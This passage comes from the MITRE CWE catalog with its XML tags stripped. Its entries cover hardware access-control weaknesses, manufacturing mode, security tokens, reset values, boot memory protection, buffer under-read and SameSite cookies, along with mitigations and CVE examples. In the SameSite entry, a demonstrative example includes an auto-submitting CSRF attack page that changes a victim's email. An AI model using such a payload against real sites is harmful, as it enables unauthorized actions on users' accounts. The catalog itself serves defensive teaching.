+ + + Consider a system of seven registers for storing and configuring an AES key for encryption or decryption. + Four 32-bit registers are used to store a 128-bit AES key. The names of those registers are AES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, and AES_ENC_DEC_KEY_3. Collectively these are referred to as the AES Key registers. + + RegisterField description + AES_ENC_DEC_KEY_0AES key [0:31] for encryption or decryptionDefault 0x00000000 + AES_ENC_DEC_KEY_1AES key [32:63] for encryption or decryptionDefault 0x00000000 + AES_ENC_DEC_KEY_2AES key [64:95] for encryption or decryptionDefault 0x00000000 + AES_ENC_DEC_KEY_3AES key [96:127] for encryption or decryptionDefault 0x00000000 + + Three 32-bit registers are used to define access control for the AES-key registers. The names of those registers are AES_KEY_CONTROL_POLICY, AES_KEY_READ_POLICY, and AES_KEY_WRITE_POLICY. Collectively these registers are referred to as the Policy registers, and their functions are explained next. + + The AES_KEY_CONTROL_POLICY register defines which agents can write to the AES_KEY_READ_POLICY or AES_KEY_WRITE_POLICY registers. + The AES_KEY_READ_POLICY register defines which agents can read the AES-key registers. + The AES_KEY_WRITE_POLICY register defines which agents can write the AES key registers. + + The preceding three policy registers encode access control at the bit level. Therefore a maximum of 32 agents can be defined (1 bit per agent). The value of the bit when set (i.e., "1") allows the respective action from an agent whose identity corresponds to the number of the bit. If clear (i.e., "0"), it disallows the respective action to that corresponding agent. For example, if bit 0 is set to "1" in the AES_KEY_READ_POLICY register, then agent 0 has permission to read the AES-key registers. + Consider that there are 4 agents named Agent 1, Agent 2, Agent 3, and Agent 4. For access control purposes Agent 1 is assigned to bit 1, Agent 2 to bit 2, Agent 3 to bit 3, and Agent 4 to bit 4. All agents are trusted except for Agent 3 who is untrusted. Also consider the register values in the below table. + + + RegisterField description + AES_KEY_CONTROL_POLICYControls which agents can write to READ_POLICY and WRITE_POLICY registers[31:0] Default 0x00000018 + AES_KEY_READ_POLICYControls which agents can read the AES-key registers[31:0] Default 0x00000002 + AES_KEY_WRITE_POLICYControls which agents can write to the AES-key registers[31:0] Default 0x00000004 + + + + IThe AES_KEY_CONTROL_POLICY register value is 0x00000018. In binary, the lower 8 bits will be 0001 1000, meaning that: + + Bits 3 and 4 are set, thus Agents 3 and 4 will have write access to AES_KEY_READ_POLICY or AES_KEY_WRITE_POLICY. + All other bits are clear, hence agents other than 3 and 4 will not have access to write to AES_KEY_READ_POLICY or AES_KEY_WRITE_POLICY. + + The AES_KEY_READ_POLICY register value is 0x00000002. In binary, the lower 8 bits will be 0000 0010, meaning that: + + Bit 1 is set, thus Agent 1 will be able to read the AES key registers. + + The AES_KEY_WRITE_POLICY register value is 0x00000004. In binary, the lower 8 bits will be 0000 0100, meaning that: + + Bit 2 is set, thus Agent 2 will be able to write the AES Key registers. + + The configured access control policy for Agents 1,2,3,4 is summarized in table below. + + AgentReadWriteControl + Agent 1AllowedNot AllowedNot Allowed + Agent 2Not AllowedAllowedNot Allowed + Agent 3Not AllowedNot AllowedAllowed + Agent 4Not AllowedNot AllowedAllowed + + At this point Agents 3 and 4 can only configure which agents can read AES keys and which agents can write AES keys. Agents 3 and 4 cannot read or write AES keys - just configure access control. + Now, recall Agent 3 is untrusted. As explained above, the value of the AES_KEY_CONTROL_POLICY register gives agent 3 access to write to the AES_KEY_WRITE_POLICY register. Agent 3 can use this write access to add themselves to the AES_KEY_WRITE_POLICY register. This is accomplished by Agent 3 writing the value 0x00000006. In binary, the lower 8 bits are 0000 0110, meaning that bit 3 will be set. Thus, giving Agent 3 having the ability to write to the AES Key registers. + If the AES_KEY_CONTROL_POLICY register value is 0x00000010, the lower 8 bits will be 0001 0000. This will give Agent 4, a trusted agent, write access to AES_KEY_WRITE_POLICY, but Agent 3, who is untrusted, will not have write access. The Policy register values should therefore be as follows: + + + RegisterField description + AES_KEY_CONTROL_POLICY[31:0] Default 0x00000010 + AES_KEY_READ_POLICY[31:0] Default 0x00000002 + AES_KEY_WRITE_POLICY[31:0] Default 0x00000004 + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is still under development and will continue to see updates and content improvements. + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-12 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Agents Included in Control Policy are not Contained in Less-Privileged Policy + + + + The product released to market is released in pre-production or manufacturing configuration. + + Products in the pre-production or manufacturing stages are configured to have many debug hooks and debug capabilities, including but not limited to: + + Ability to override/bypass various cryptographic checks (including authentication, authorization, and integrity) + Ability to read/write/modify/dump internal state (including registers and memory) + Ability to change system configurations + Ability to run hidden or private commands that are not allowed during production (as they expose IP). + The above is by no means an exhaustive list, but it alludes to the greater capability and the greater state of vulnerability of a product during it's preproduction or manufacturing state. + Complexity increases when multiple parties are involved in executing the tests before the final production version. For example, a chipmaker might fabricate a chip and run its own preproduction tests, following which the chip would be delivered to the Original Equipment Manufacturer (OEM), who would now run a second set of different preproduction tests on the same chip. Only after both of these sets of activities are complete, can the overall manufacturing phase be called "complete" and have the "Manufacturing Complete" fuse blown. However, if the OEM forgets to blow the Manufacturing Complete fuse, then the system remains in the manufacturing stage, rendering the system both exposed and vulnerable. + + + + + + + + + + + + + + + + Implementation + + + Integration + + + Manufacturing + + + + + Confidentiality + Integrity + Availability + Access Control + Accountability + Authentication + Authorization + Non-Repudiation + Other + High + + + + + Implementation + Ensure that there exists a marker for denoting the Manufacturing Complete stage and that the Manufacturing Complete marker gets updated at the Manufacturing Complete stage (i.e., the Manufacturing Complete fuse gets blown). + + + Integration + Ensure that there exists a marker for denoting the Manufacturing Complete stage and that the Manufacturing Complete marker gets updated at the Manufacturing Complete stage (i.e., the Manufacturing Complete fuse gets blown). + + + Manufacturing + Ensure that there exists a marker for denoting the Manufacturing Complete stage and that the Manufacturing Complete marker gets updated at the Manufacturing Complete stage (i.e., the Manufacturing Complete fuse gets blown). + + + + + This example shows what happens when a preproduction system is made available for production. + Suppose the chipmaker has a way of scanning all the internal memory (containing chipmaker-level secrets) during the manufacturing phase, and the way the chipmaker or the Original Equipment Manufacturer (OEM) marks the end of the manufacturing phase is by blowing a Manufacturing Complete fuse. Now, suppose that whoever blows the Manufacturing Complete fuse inadvertently forgets to execute the step to blow the fuse. + An attacker will now be able to scan all the internal memory (containing chipmaker-level secrets). + Blow the Manufacturing Complete fuse. + + + + + CVE-2019-13945 + Regarding SSA-686531, a hardware based manufacturing access on S7-1200 and + S7-200 SMART has occurred. A vulnerability has been identified in SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All versions), SIMATIC S7-200 SMART CPU family (All versions). There is an access mode used during manufacturing of S7-1200 CPUs that allows additional diagnostic functionality. The security vulnerability could be exploited by an attacker with physical access to the UART interface during boot process. At the time of advisory publication, no public exploitation of this security vulnerability was known. + https://www.cve.org/CVERecord?id=CVE-2019-13945 + + + CVE-2018-4251 + Laptops with Intel chipsets were found to be running in Manufacturing Mode. After this information was reported to the OEM, the vulnerability (CVE-2018-4251) was patched disallowing access to the interface. + https://www.cve.org/CVERecord?id=CVE-2018-4251 + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-05-31 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations prior to the targeted buffer. + This typically occurs when the pointer or its index is decremented to a position before the buffer, when pointer arithmetic results in a position before the beginning of the valid memory location, or when a negative index is used. This may result in exposure of sensitive information or possibly a crash. + + + + + + + Primary + + + + + + + + + Implementation + + + + + Confidentiality + Read Memory + + + Confidentiality + Bypass Protection Mechanism + By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of service. + + + + + Buffer under-read + + + SFP8 + Faulty Buffer Access + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Under-studied. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature + + + CWE Content Team + MITRE + 2019-09-19 + updated Common_Consequences, References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens generated in the system are incorrect. + + Systems-On-a-Chip (SoC) (Integrated circuits and hardware engines) implement Security Tokens to differentiate and identify actions originated from various agents. These actions could be "read", "write", "program", "reset", "fetch", "compute", etc. Security Tokens are generated and assigned to every agent on the SoC that is either capable of generating an action or receiving an action from another agent. Every agent could be assigned a unique, Security Token based on its trust level or privileges. Incorrectly generated Security Tokens could result in the same token used for multiple agents or multiple tokens being used for the same agent. This condition could result in a Denial-of-Service (DoS) or the execution of an action that in turn could result in privilege escalation or unintended access. + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Integrity + Availability + Access Control + Modify Files or Directories + Execute Unauthorized Code or Commands + Bypass Protection Mechanism + Gain Privileges or Assume Identity + Read Memory + Modify Memory + DoS: Crash, Exit, or Restart + High + + + + + Architecture and Design + Implementation + + + Generation of Security Tokens should be reviewed for design inconsistency and common weaknesses. + Security-Token definition and programming flow should be tested in pre-silicon and post-silicon testing. + + + + + + + Consider a system with a register for storing an AES key for encryption or decryption. The key is 128 bits long implemented as a set of four 32-bit registers. The key registers are assets, and register, AES_KEY_ACCESS_POLICY, is defined to provide necessary access controls. The access-policy register defines which agents, using a Security Token, may access the AES-key registers. Each bit in this 32-bit register is used to define a Security Token. There could be a maximum of 32 Security Tokens that are allowed access to the AES-key registers. When set (bit = "1") bit number allows action from an agent whose identity matches that bit number. If Clear (bit = "0") the action is disallowed for the corresponding agent. + + Assume the system has two agents: a Main-controller and an Aux-controller. The respective Security Tokens are "1" and "2". + + + + Register + Description + Default + + + AES_ENC_DEC_KEY_0 + AES key [0:31] for encryption or decryption + 0x00000000 + + + AES_ENC_DEC_KEY_1 + AES key [32:63] for encryption or decryption + 0x00000000 + + + AES_ENC_DEC_KEY_2 + AES key [64:95] for encryption or decryption + 0x00000000 + + + AES_ENC_DEC_KEY_3 + AES key [96:127] for encryption or decryption + 0x00000000 + + + AES_KEY_ACCESS_POLICY + AES key access register [31:0] + 0x00000002 + + + + + An agent with a Security Token "1" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers. As per the above access policy, the AES-Key-access policy allows access to the AES-key registers if the security Token is "1". + + The SoC incorrectly generates Security Token "1" for every agent. In other words, both Main-controller and Aux-controller are assigned Security Token "1". + Both agents have access to the AES-key registers. + The SoC should correctly generate Security Tokens, assigning "1" to the Main-controller and "2" to the Aux-controller + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-03-06 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Generation of Incorrect Security Identifiers + + + + Security-critical logic is not set to a known value on reset. + + When the device is first brought out of reset, the state of registers will be indeterminate if they have not been initialized by the logic. Before the registers are initialized, there will be a window during which the device is in an insecure state and may be vulnerable to attack. + + + + + + + Primary + + + + + + + + + + + Implementation + + + + + Access Control + Authentication + Authorization + Varies by Context + + + + + Implementation + Design checks should be performed to identify any uninitialized flip-flops used for security-critical functions. + + + Architecture and Design + All registers holding security-critical information should be set to a specific value on reset. + + + + + Shown below is a positive clock edge triggered flip-flop used to implement a lock bit for test and debug interface. When the circuit is first brought out of reset, the state of the flip-flop will be unknown until the enable input and D-input signals update the flip-flop state. In this example, an attacker can reset the device until the test and debug interface is unlocked and access the test interface until the lock signal is driven to a known state by the logic. + + always @(posedge clk) begin + + if (en) lock_jtag <= d; + + end + + The flip-flop can be set to a known value (0 or 1) on reset, but requires that the logic explicitly update the output of the flip-flop if the reset signal is active. + + always @(posedge clk) begin + + if (~reset) lock_jtag <= 0; + else if (en) lock_jtag <= d; + + end + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is still under development and will continue to see updates and content improvements. + + + + Nicole Fern + Tortuga Logic + 2020-05-15 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Name, Type + + + CWE Content Team + MITRE + 2021-10-28 + updated Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Missing Known Value on Reset for Registers Holding Security Settings + Unitialized Value on Reset for Registers Holding Security Settings + + + + The product performs a power or debug state transition, but it does not clear sensitive information that should no longer be accessible due to changes to information access restrictions. + + A device or system frequently employs many power and sleep states during its normal operation (e.g., normal power, additional power, low power, hibernate, deep sleep, etc.). A device also may be operating within a debug condition. State transitions can happen from one power or debug state to another. If there is information available in the previous state which should not be available in the next state and is not properly removed before the transition into the next state, sensitive information may leak from the system. + + + + + + + + Primary + + + + + + + + + + + + + Architecture and Design + + + + + Confidentiality + Integrity + Availability + Access Control + Accountability + Authentication + Authorization + Non-Repudiation + Read Memory + Read Application Data + High + Sensitive information may be used to unlock additional capabilities of the device and take advantage of hidden functionalities which could be used to compromise device security. + + + + + Manual Analysis + Write a known pattern into each sensitive location. Enter the power/debug state in question. Read data back from the sensitive locations. If the reads are successful, and the data is the same as the pattern that was originally written, the test fails and the device needs to be fixed. Note that this test can likely be automated. + High + + + + + Architecture and Design + Implementation + During state transitions, information not needed in the next state should be removed before the transition to the next state. + + + + + This example shows how an attacker can take advantage of an incorrect state transition. + + Suppose a device is transitioning from state A to state B. During state A, it can read certain private keys from the hidden fuses that are only accessible in state A but not in state B. The device reads the keys, performs operations using those keys, then transitions to state B, where those private keys should no longer be accessible. + + + During the transition from A to B, the device does not scrub the memory. + + After the transition to state B, even though the private keys are no longer accessible directly from the fuses in state B, they can be accessed indirectly by reading the memory that contains the private keys. + For transition from state A to state B, remove information which should not be available once the transition is complete. + + + + + CVE-2020-12926 + Product software does not set a flag as per TPM specifications, thereby preventing a failed authorization attempt from being recorded after a loss of power. + https://www.cve.org/CVERecord?id=CVE-2020-12926 + + + + Power + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi + Intel Corporation + 2020-05-31 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Functional_Areas + + + CWE Content Team + MITRE + 2021-10-28 + updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Observed_Examples, Potential_Mitigations, References, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-10-13 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Debug/Power State Transitions Leak Information + + + + The credentials necessary for unlocking a device are shared across multiple parties and may expose sensitive information. + + "Unlocking a device" often means activating certain unadvertised debug and manufacturer-specific capabilities of a device using sensitive credentials. Unlocking a device might be necessary for the purpose of troubleshooting device problems. For example, suppose a device contains the ability to dump the content of the full system memory by disabling the memory-protection mechanisms. Since this is a highly security-sensitive capability, this capability is "locked" in the production part. Unless the device gets unlocked by supplying the proper credentials, the debug capabilities are not available. For cases where the chip designer, chip manufacturer (fabricator), and manufacturing and assembly testers are all employed by the same company, the risk of compromise of the credentials is greatly reduced. However, the risk is greater when the chip designer is employed by one company, the chip manufacturer is employed by another company (a foundry), and the assemblers and testers are employed by yet a third company. Since these different companies will need to perform various tests on the device to verify correct device function, they all need to share the unlock key. Unfortunately, the level of secrecy and policy might be quite different at each company, greatly increasing the risk of sensitive credentials being compromised. + + + + + + + + + + + + + + + + Integration + + + Manufacturing + + + + + Confidentiality + Integrity + Availability + Access Control + Accountability + Authentication + Authorization + Non-Repudiation + Modify Memory + Read Memory + Modify Files or Directories + Read Files or Directories + Modify Application Data + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Once unlock credentials are compromised, an attacker can use the credentials to unlock the device and gain unauthorized access to the hidden functionalities protected by those credentials. + + + + + Integration + Ensure the unlock credentials are shared with the minimum number of parties and with utmost secrecy. To limit the risk associated with compromised credentials, where possible, the credentials should be part-specific. + + + Manufacturing + Ensure the unlock credentials are shared with the minimum number of parties and with utmost secrecy. To limit the risk associated with compromised credentials, where possible, the credentials should be part-specific. + + + + + This example shows how an attacker can take advantage of compromised credentials. + Suppose a semiconductor chipmaker, "C", uses the foundry "F" for fabricating its chips. Now, F has many other customers in addition to C, and some of the other customers are much smaller companies. F has dedicated teams for each of its customers, but somehow it mixes up the unlock credentials and sends the unlock credentials of C to the wrong team. This other team does not take adequate precautions to protect the credentials that have nothing to do with them, and eventually the unlock credentials of C get leaked. + When the credentials of multiple organizations are stored together, exposure to third parties occurs frequently. + Vertical integration of a production company is one effective method of protecting sensitive credentials. Where vertical integration is not possible, strict access control and need-to-know are methods which can be implemented to reduce these risks. + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is still under development and will continue to see updates and content improvements. + + + + + Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi + Intel Corporation + 2020-05-29 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples, Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2022-10-13 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product conducts a secure-boot process that transfers bootloader code from Non-Volatile Memory (NVM) into Volatile Memory (VM), but it does not have sufficient access control or other protections for the Volatile Memory. + + Adversaries could bypass the secure-boot process and execute their own untrusted, malicious boot code. + As a part of a secure-boot process, the read-only-memory (ROM) code for a System-on-Chip (SoC) or other system fetches bootloader code from Non-Volatile Memory (NVM) and stores the code in Volatile Memory (VM), such as dynamic, random-access memory (DRAM) or static, random-access memory (SRAM). The NVM is usually external to the SoC, while the VM is internal to the SoC. As the code is transferred from NVM to VM, it is authenticated by the SoC's ROM code. + If the volatile-memory-region protections or access controls are insufficient to prevent modifications from an adversary or untrusted agent, the secure boot may be bypassed or replaced with the execution of an adversary's code. + + + + + + + Primary + + + + + + + + + + + Architecture and Design + This weakness can be introduced during hardware architecture or design but can be identified later during testing. + + + + + Access Control + Integrity + Modify Memory + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + High + + + + + Manual Analysis + Ensure the volatile memory is lockable or has locks. Ensure the volatile memory is locked for writes from untrusted agents or adversaries. Try modifying the volatile memory from an untrusted agent, and ensure these writes are dropped. + + High + + + Manual Analysis + + Analyze the device using the following steps: + + 1) Identify all fabric master agents that are active during system Boot Flow when initial code is loaded from Non-volatile storage to volatile memory. + 2) Identify the volatile memory regions that are used for storing loaded system executable program. + 3) During system boot, test programming the identified memory regions in step 2 from all the masters identified in step 1. + + Only trusted masters should be allowed to write to the memory regions. For example, pluggable device peripherals should not have write access to program load memory regions. + + Moderate + + + + + Architecture and Design + Ensure that the design of volatile-memory protections is enough to prevent modification from an adversary or untrusted code. + + + Testing + Test the volatile-memory protections to ensure they are safe from modification or untrusted code. + + + + + A typical SoC secure boot's flow includes fetching the next piece of code (i.e., the boot loader) from NVM (e.g., serial, peripheral interface (SPI) flash), and transferring it to DRAM/SRAM volatile, internal memory, which is more efficient. + The volatile-memory protections or access controls are insufficient. + The memory from where the boot loader executes can be modified by an adversary. + A good architecture should define appropriate protections or access controls to prevent modification by an adversary or untrusted agent, once the bootloader is authenticated. + + + + + CVE-2019-2267 + Locked memory regions may be modified through other interfaces in a secure-boot-loader image due to improper access control. + https://www.cve.org/CVERecord?id=CVE-2019-2267 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-04-25 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples, Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Narasimha Kumar V Mangipudi + Lattice Semiconductor + 2021-10-20 + suggested content improvements + + + Hareesh Khattri + Intel Corporation + 2021-10-22 + provided detection method + + Insufficient Protections on the Volatile Memory Containing Boot Code + + + + The SameSite attribute for sensitive cookies is not set, or an insecure value is used. + The SameSite attribute controls how cookies are sent for cross-domain requests. This attribute may have three values: 'Lax', 'Strict', or 'None'. If the 'None' value is used, a website may create a cross-domain POST HTTP request to another website, and the browser automatically adds cookies to this request. This may lead to Cross-Site-Request-Forgery (CSRF) attacks if there are no additional protections in place (such as Anti-CSRF tokens). + + + + + + + + + + + + + Implementation + This weakness occurs during implementation when the coder does not properly set the SameSite attribute. + + + Medium + + + Confidentiality + Integrity + Non-Repudiation + Access Control + Modify Application Data + Low + If the website does not impose additional defense against CSRF attacks, failing to use the 'Lax' or 'Strict' values could increase the risk of exposure to CSRF attacks. The likelihood of the integrity breach is Low because a successful attack does not only depend on an insecure SameSite attribute. In order to perform a CSRF attack there are many conditions that must be met, such as the lack of CSRF tokens, no confirmations for sensitive actions on the website, a "simple" "Content-Type" header in the HTTP request and many more. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Set the SameSite attribute of a sensitive cookie to 'Lax' or 'Strict'. This instructs the browser to apply this cookie only to same-domain requests, which provides a good Defense in Depth against CSRF attacks. When the 'Lax' value is in use, cookies are also sent for top-level cross-domain navigation via HTTP GET, HEAD, OPTIONS, and TRACE methods, but not for other HTTP methods that are more like to cause side-effects of state mutation. + High + While this mitigation is effective for protecting cookies from a browser's own scripting engine, third-party components or plugins may have their own engines that allow access to cookies. Attackers might also be able to use XMLHTTPResponse to read the headers directly and obtain the cookie. + + + + + In this example, a cookie is used to store a session ID for a client's interaction with a website. The snippet of code below establishes a new cookie to hold the sessionID. + + let sessionId = generateSessionId() + let cookieOptions = { domain: 'example.com' } + response.cookie('sessionid', sessionId, cookieOptions) + + Since the sameSite attribute is not specified, the cookie will be sent to the website with each request made by the client. An attacker can potentially perform CSRF attack by using the following malicious page: + + <html> + + <form id=evil action="http://local:3002/setEmail" method="POST"> + + <input type="hidden" name="newEmail" value="abc@example.com" /> + + </form> + + <script>evil.submit()</script> + </html> + + When the client visits this malicious web page, it submits a '/setEmail' POST HTTP request to the vulnerable website. Since the browser automatically appends the 'sessionid' cookie to the request, the website automatically performs a 'setEmail' action on behalf of the client. + To mitigate the risk, use the sameSite attribute of the 'sessionid' cookie set to 'Strict'. + + let sessionId = generateSessionId() + let cookieOptions = { domain: 'example.com', sameSite: 'Strict' } + response.cookie('sessionid', sessionId, cookieOptions) + + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Michael Stepankin + Veracode + 2020-06-19 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Signals between a hardware IP and the parent system design are incorrectly connected causing security risks. + + Individual hardware IP must communicate with the parent system in order for the product to function correctly and as intended. If implemented incorrectly, while not causing any apparent functional issues, may cause security issues. For example, if the IP should only be reset by a system-wide hard reset, but instead the reset input is connected to a software-triggered debug mode reset (which is also asserted during a hard reset), integrity of data inside the IP can be violated. + + + + + + + + + + + + + Implementation + This weakness is introduced when integrating IP into a parent design. + + + + + Confidentiality + Integrity + Availability + Varies by Context + + + + + Testing + System-level verification may be used to ensure that components are correctly connected and that design security requirements are not violated due to interactions between various IP blocks. + + + + + Many SoCs use hardware to partition system resources between trusted and un-trusted entities. One example of this concept is the Arm TrustZone, in which the processor and all security-aware IP attempt to isolate resources based on the status of a privilege bit. This privilege bit is part of the input interface in all TrustZone-aware IP. If this privilege bit is accidentally grounded or left unconnected when the IP is instantiated, privilege escalation of all input data may occur. + + // IP definition + module tz_peripheral(clk, reset, data_in, data_in_security_level, ...); + + input clk, reset; + input [31:0] data_in; + input data_in_security_level; + ... + + endmodule + // Instantiation of IP in a parent system + module soc(...) + + ... + tz_peripheral u_tz_peripheral( + + .clk(clk), + .rst(rst), + .data_in(rdata), + //Copy-and-paste error or typo grounds data_in_security_level (in this example 0=secure, 1=non-secure) effectively promoting all data to "secure") + .data_in_security_level(1'b0), + + ); + ... + + 